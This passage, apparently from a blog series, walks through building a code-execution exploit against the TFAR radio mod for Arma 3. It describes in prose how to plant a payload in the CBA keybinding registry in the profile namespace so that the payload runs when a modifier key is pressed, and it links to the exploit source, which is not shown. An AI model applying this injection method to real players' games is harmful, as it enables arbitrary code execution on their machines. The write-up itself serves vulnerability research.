TFAR Code Execution
Okay, the last bit was quite heavy, but now we know everything we need to successfully write exploitable code to the keybind data. Let me line out what we know in a more effective way:
- The data’s source lies in the profilenamespace within the variable “cba_keybinding_registry_v3“
- The action name is “”tfar$lrtransmit”
- By finding the index at (_registry select 1) of our action, we can find the keybind data
- The keybind data is stored in (_regsitry select 2)
- This keybind data is then moved into GVAR(actions) getVariable (action_name) under index #2
- The keybind data in CBA_fnc_getKeybind is 1 layer deep (select 0)
- This keybind data is returned in CBA_fnc_getKeybind under index #5
- The keybind data is structured as [keycode,keymods] where keymods is an array of boolean values
- If a value of keymods is code, TFAR should lazy evaluate it as long as either SHIFT, CTRL, or ALT, is pressed.
So now that we know all of this, we can build an exploit.
Our first step is to get the registry, or create a new one, for cba_keybinding_registry_v3. Next, we must find our action in the registry. If our item does exist, we must set the value in the registry for that index to an exploitable payload. Remember, the payload must be an array within an array as CBA_fnc_getKeybind accesses index 0 before returning. If our item does not exist, we just have to push it back into the registry.
And that is it. Now if we load up a game with TFAR and press, in my example, SHIFT, it’ll execute the payload.
As always, the source for my exploit can be found on my hastebin here.